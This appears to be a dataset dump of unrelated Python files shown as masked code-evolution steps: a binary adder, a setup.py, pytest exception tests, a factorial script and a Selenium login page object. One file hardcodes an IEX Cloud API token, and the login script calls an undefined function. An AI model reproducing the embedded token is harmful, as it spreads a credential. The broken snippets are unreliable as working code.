"step-4": "<mask token>\n__author__ = 'David Vaillant'\n__credits__ = 'CLRS, Chapter 2.1'\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\nif __name__ == '__main__':\n unit_test()\n",
"step-5": "\"\"\" binary_adder.py: Takes two arrays representing binary numbers,\n adds them together. \"\"\"\n\n__author__ = \"David Vaillant\"\n__credits__ = \"CLRS, Chapter 2.1\"\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n # Makes sure that the arrays have the same length.\n # Could be changed to padding on extra zeroes, if so desired.\n assert(len(x) == len(y))\n\n z = [0] * (len(x)+1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n # Makes sure that the array is a binary array.\n # Strictly speaking, not necessary. But nice.\n if i not in [0, 1]: return False\n if j not in [0, 1]: return False\n\n # if i and j are both 1 \n if i and j:\n z[a] += 0\n z[a+1] += 1\n # if only one of them is 1\n elif i or j:\n z[a] += 1\n # if they're both 0\n else: pass\n\n if z[a] == 2:\n z[a+1] += 1\n z[a] -= 2\n \n return z[::-1]\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = ( [1, 0, 0],\n [1],\n [0],\n [1, 0, 0, 1],\n [1, 1, 1, 1],\n [1, 0, 0, 0, 0])\n y_arr = ( [0, 1, 1],\n [0],\n [0, 0],\n [1, 1, 0, 0],\n [0, 0, 0, 0],\n [1, 0, 0, 0, 0])\n z_arr = ( [0, 1, 1, 1],\n [0, 1],\n None,\n [1, 0, 1, 0, 1],\n [0, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0] )\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print(\"Adding {} to {}.\".format(x, y))\n if sum == z_arr[a]:\n print(\"Successfully returned {}.\".format(sum))\n else:\n print(\"Got {} instead of {}.\".format(sum, z_arr[a]))\n print()\n\nif __name__ == \"__main__\":\n unit_test()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='google-drive-helpers', version='0.1', description=
'Helper functions for google drive', url=
'https://github.com/jdoepfert/google-drive-helpers', license='MIT',
packages=['gdrive_helpers'], install_requires=[
'google-api-python-client'], zip_safe=False)
<|reserved_special_token_1|>
from setuptools import setup
setup(name='google-drive-helpers', version='0.1', description=
'Helper functions for google drive', url=
'https://github.com/jdoepfert/google-drive-helpers', license='MIT',
packages=['gdrive_helpers'], install_requires=[
'google-api-python-client'], zip_safe=False)
<|reserved_special_token_1|>
from setuptools import setup

# Packaging manifest for the gdrive_helpers package.
setup(
    name='google-drive-helpers',
    version='0.1',
    description='Helper functions for google drive',
    url='https://github.com/jdoepfert/google-drive-helpers',
    license='MIT',
    packages=['gdrive_helpers'],
    install_requires=['google-api-python-client'],
    zip_safe=False,
)
|
flexible
|
{
"blob_id": "c0218acadb9e03359ac898cf3bb4898f516400e5",
"index": 5361,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='google-drive-helpers', version='0.1', description=\n 'Helper functions for google drive', url=\n 'https://github.com/jdoepfert/google-drive-helpers', license='MIT',\n packages=['gdrive_helpers'], install_requires=[\n 'google-api-python-client'], zip_safe=False)\n",
"step-3": "from setuptools import setup\nsetup(name='google-drive-helpers', version='0.1', description=\n 'Helper functions for google drive', url=\n 'https://github.com/jdoepfert/google-drive-helpers', license='MIT',\n packages=['gdrive_helpers'], install_requires=[\n 'google-api-python-client'], zip_safe=False)\n",
"step-4": "from setuptools import setup\n\nsetup(name='google-drive-helpers',\n version='0.1',\n description='Helper functions for google drive',\n url='https://github.com/jdoepfert/google-drive-helpers',\n license='MIT',\n packages=['gdrive_helpers'],\n install_requires=[\n 'google-api-python-client',\n ],\n zip_safe=False)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
# API token for IEX Cloud; the 'Tpk_' prefix suggests a sandbox/test
# publishable key — confirm against the IEX console.
# NOTE(review): committing tokens to source control is risky even for
# sandbox keys; consider loading this from an environment variable.
IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'
|
flexible
|
{
"blob_id": "86849d0e63cdb93a16497ca56ff9c64c15a60fa7",
"index": 4891,
"step-1": "<mask token>\n",
"step-2": "IEX_CLOUD_API_TOKEN = 'Tpk_5d9dc536610243cda2c8ef4787d729b6'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
<|reserved_special_token_0|>
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
exc = exc_type('url', 'id')
assert repr(('url', 'id')) in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
import pickle
import pytest
from reader import EntryError
from reader import FeedError
from reader import SingleUpdateHookError
from reader import TagError
from reader.exceptions import _FancyExceptionBase
def test_fancy_exception_base():
exc = _FancyExceptionBase('message')
assert str(exc) == 'message'
exc = _FancyExceptionBase(message='message')
assert str(exc) == 'message'
cause = Exception('cause')
exc = _FancyExceptionBase('message')
exc.__cause__ = cause
pickled_exc = pickle.dumps(exc)
assert str(exc) == 'message: builtins.Exception: cause'
assert str(exc) == str(pickle.loads(pickled_exc))
class WithURL(_FancyExceptionBase):
message = 'default message'
def __init__(self, url, **kwargs):
super().__init__(**kwargs)
self.url = url
@property
def _str(self):
return self.url.upper()
exc = WithURL('url')
assert str(exc) == 'default message: URL'
exc = WithURL('url', message='another message')
exc.__cause__ = cause
assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
def all_classes(*args, **kwargs):
return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
exc = exc_type('url')
assert repr('url') in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
exc = exc_type('url', 'id')
assert repr(('url', 'id')) in str(exc)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
exc = exc_type(('object',), 'key')
assert "'object': 'key'" in str(exc)
@pytest.mark.parametrize('args, expected', [(('before_feeds_update',
'myhook'), "unexpected hook error: before_feeds_update: 'myhook'"), ((
'before_feeds_update', 'myhook', ()),
"unexpected hook error: before_feeds_update: 'myhook': ()"), ((
'before_feed_update', 'myhook', ('feed',)),
"unexpected hook error: before_feed_update: 'myhook': 'feed'"), ((
'after_entry_update', 'myhook', ('feed', 'entry')),
"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')")])
def test_single_update_hook_error_str(args, expected):
exc = SingleUpdateHookError(*args)
assert str(exc) == expected
exc = SingleUpdateHookError(*args)
exc.__cause__ = Exception('cause')
assert str(exc) == expected + ': builtins.Exception: cause'
<|reserved_special_token_1|>
import pickle
import pytest
from reader import EntryError
from reader import FeedError
from reader import SingleUpdateHookError
from reader import TagError
from reader.exceptions import _FancyExceptionBase
def test_fancy_exception_base():
    """Exercise _FancyExceptionBase: message handling, cause chaining,
    pickle round-tripping, and subclass customisation via `_str`."""
    assert str(_FancyExceptionBase('message')) == 'message'
    assert str(_FancyExceptionBase(message='message')) == 'message'

    cause = Exception('cause')

    exc = _FancyExceptionBase('message')
    exc.__cause__ = cause
    pickled_exc = pickle.dumps(exc)
    assert str(exc) == 'message: builtins.Exception: cause'
    # The string form must survive a pickle round-trip.
    assert str(pickle.loads(pickled_exc)) == str(exc)

    class WithURL(_FancyExceptionBase):
        message = 'default message'

        def __init__(self, url, **kwargs):
            super().__init__(**kwargs)
            self.url = url

        @property
        def _str(self):
            return self.url.upper()

    assert str(WithURL('url')) == 'default message: URL'

    exc = WithURL('url', message='another message')
    exc.__cause__ = cause
    assert str(exc) == 'another message: URL: builtins.Exception: cause'
def _all_classes(cls):
yield cls
for subclass in cls.__subclasses__():
yield from _all_classes(subclass)
# Eager wrapper: materialize the _all_classes generator into a list.
def all_classes(*args, **kwargs):
    return list(_all_classes(*args, **kwargs))
@pytest.mark.parametrize('exc_type', all_classes(FeedError))
def test_feed_error_str(exc_type):
    """Every FeedError subclass shows the feed URL in its str()."""
    err = exc_type('url')
    assert repr('url') in str(err)
@pytest.mark.parametrize('exc_type', all_classes(EntryError))
def test_entry_error_str(exc_type):
    """Every EntryError subclass shows the (url, id) pair in its str()."""
    err = exc_type('url', 'id')
    assert repr(('url', 'id')) in str(err)
@pytest.mark.parametrize('exc_type', all_classes(TagError))
def test_tag_error_str(exc_type):
    """Every TagError subclass shows the resource and key in its str()."""
    err = exc_type(('object',), 'key')
    message = str(err)
    assert "'object': 'key'" in message
# (constructor args, expected str()) pairs covering each hook stage and
# each resource-argument arity.
_HOOK_ERROR_CASES = [
    (('before_feeds_update', 'myhook'),
     "unexpected hook error: before_feeds_update: 'myhook'"),
    (('before_feeds_update', 'myhook', ()),
     "unexpected hook error: before_feeds_update: 'myhook': ()"),
    (('before_feed_update', 'myhook', ('feed',)),
     "unexpected hook error: before_feed_update: 'myhook': 'feed'"),
    (('after_entry_update', 'myhook', ('feed', 'entry')),
     "unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')"),
]


@pytest.mark.parametrize('args, expected', _HOOK_ERROR_CASES)
def test_single_update_hook_error_str(args, expected):
    """str() shows hook stage, hook name, resource, and any chained cause."""
    exc = SingleUpdateHookError(*args)
    assert str(exc) == expected

    exc = SingleUpdateHookError(*args)
    exc.__cause__ = Exception('cause')
    assert str(exc) == expected + ': builtins.Exception: cause'
|
flexible
|
{
"blob_id": "6fd4df7370de2343fe7723a2d8f5aacffa333835",
"index": 3105,
"step-1": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = 
SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-2": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\n<mask token>\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = 
SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-3": "<mask token>\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': ()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected 
hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-4": "import pickle\nimport pytest\nfrom reader import EntryError\nfrom reader import FeedError\nfrom reader import SingleUpdateHookError\nfrom reader import TagError\nfrom reader.exceptions import _FancyExceptionBase\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n cause = Exception('cause')\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected]('args, expected', [(('before_feeds_update',\n 'myhook'), \"unexpected hook error: before_feeds_update: 'myhook'\"), ((\n 'before_feeds_update', 'myhook', ()),\n \"unexpected hook error: before_feeds_update: 'myhook': 
()\"), ((\n 'before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\"), ((\n 'after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\")])\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + ': builtins.Exception: cause'\n",
"step-5": "import pickle\n\nimport pytest\n\nfrom reader import EntryError\nfrom reader import FeedError\nfrom reader import SingleUpdateHookError\nfrom reader import TagError\nfrom reader.exceptions import _FancyExceptionBase\n\n\ndef test_fancy_exception_base():\n exc = _FancyExceptionBase('message')\n assert str(exc) == 'message'\n\n exc = _FancyExceptionBase(message='message')\n assert str(exc) == 'message'\n\n cause = Exception('cause')\n\n exc = _FancyExceptionBase('message')\n exc.__cause__ = cause\n pickled_exc = pickle.dumps(exc)\n assert str(exc) == 'message: builtins.Exception: cause'\n assert str(exc) == str(pickle.loads(pickled_exc))\n\n class WithURL(_FancyExceptionBase):\n message = 'default message'\n\n def __init__(self, url, **kwargs):\n super().__init__(**kwargs)\n self.url = url\n\n @property\n def _str(self):\n return self.url.upper()\n\n exc = WithURL('url')\n assert str(exc) == 'default message: URL'\n\n exc = WithURL('url', message='another message')\n exc.__cause__ = cause\n assert str(exc) == 'another message: URL: builtins.Exception: cause'\n\n\ndef _all_classes(cls):\n yield cls\n for subclass in cls.__subclasses__():\n yield from _all_classes(subclass)\n\n\ndef all_classes(*args, **kwargs):\n return list(_all_classes(*args, **kwargs))\n\n\[email protected]('exc_type', all_classes(FeedError))\ndef test_feed_error_str(exc_type):\n exc = exc_type('url')\n assert repr('url') in str(exc)\n\n\[email protected]('exc_type', all_classes(EntryError))\ndef test_entry_error_str(exc_type):\n exc = exc_type('url', 'id')\n assert repr(('url', 'id')) in str(exc)\n\n\[email protected]('exc_type', all_classes(TagError))\ndef test_tag_error_str(exc_type):\n exc = exc_type(('object',), 'key')\n assert \"'object': 'key'\" in str(exc)\n\n\[email protected](\n 'args, expected',\n [\n (\n ('before_feeds_update', 'myhook'),\n \"unexpected hook error: before_feeds_update: 'myhook'\",\n ),\n (\n ('before_feeds_update', 'myhook', ()),\n \"unexpected hook error: 
before_feeds_update: 'myhook': ()\",\n ),\n (\n ('before_feed_update', 'myhook', ('feed',)),\n \"unexpected hook error: before_feed_update: 'myhook': 'feed'\",\n ),\n (\n ('after_entry_update', 'myhook', ('feed', 'entry')),\n \"unexpected hook error: after_entry_update: 'myhook': ('feed', 'entry')\",\n ),\n ],\n)\ndef test_single_update_hook_error_str(args, expected):\n exc = SingleUpdateHookError(*args)\n assert str(exc) == expected\n exc = SingleUpdateHookError(*args)\n exc.__cause__ = Exception('cause')\n assert str(exc) == expected + \": builtins.Exception: cause\"\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
print(fact(n))
<|reserved_special_token_1|>
n = int(input('val : '))
def fact(n):
c = 1
for i in range(1, n + 1):
c *= i
return c
print(fact(n))
<|reserved_special_token_1|>
n=int(input("val : "))
def fact(n):
c=1;
for i in range(1,n+1):
c*=i;
return c;
print(fact(n));
|
flexible
|
{
"blob_id": "1f4d9f5406b91fd687c0ace8ed29e3c4dfb4d3d2",
"index": 8748,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\nprint(fact(n))\n",
"step-4": "n = int(input('val : '))\n\n\ndef fact(n):\n c = 1\n for i in range(1, n + 1):\n c *= i\n return c\n\n\nprint(fact(n))\n",
"step-5": "n=int(input(\"val : \"))\r\n\r\n\r\ndef fact(n):\r\n c=1;\r\n for i in range(1,n+1):\r\n c*=i;\r\n return c;\r\n\r\nprint(fact(n));",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Dang Kai
# @Date: 2018-10-30 15:52:57
# @Last Modified time: 2018-11-10 09:09:21
# @E-mail: [email protected]
# @Description:
from time import sleep
import sys
sys.path.append('../')
from common.encapsulation import BasePage
class IndexPage:
def login(self, username, password):
# 登录页面
BasePage.open_url(self,self.base_url)
BasePage.send_key(self,'css','#username',username)
BasePage.send_key(self,'css',"#password",password)
BasePage.click_element(self,"css",".ant-btn")
if __name__ == '__main__':
login_cookies(self)
|
normal
|
{
"blob_id": "463f50567c9dd4b7b47a84eea715541cec5d3cb5",
"index": 2110,
"step-1": "<mask token>\n",
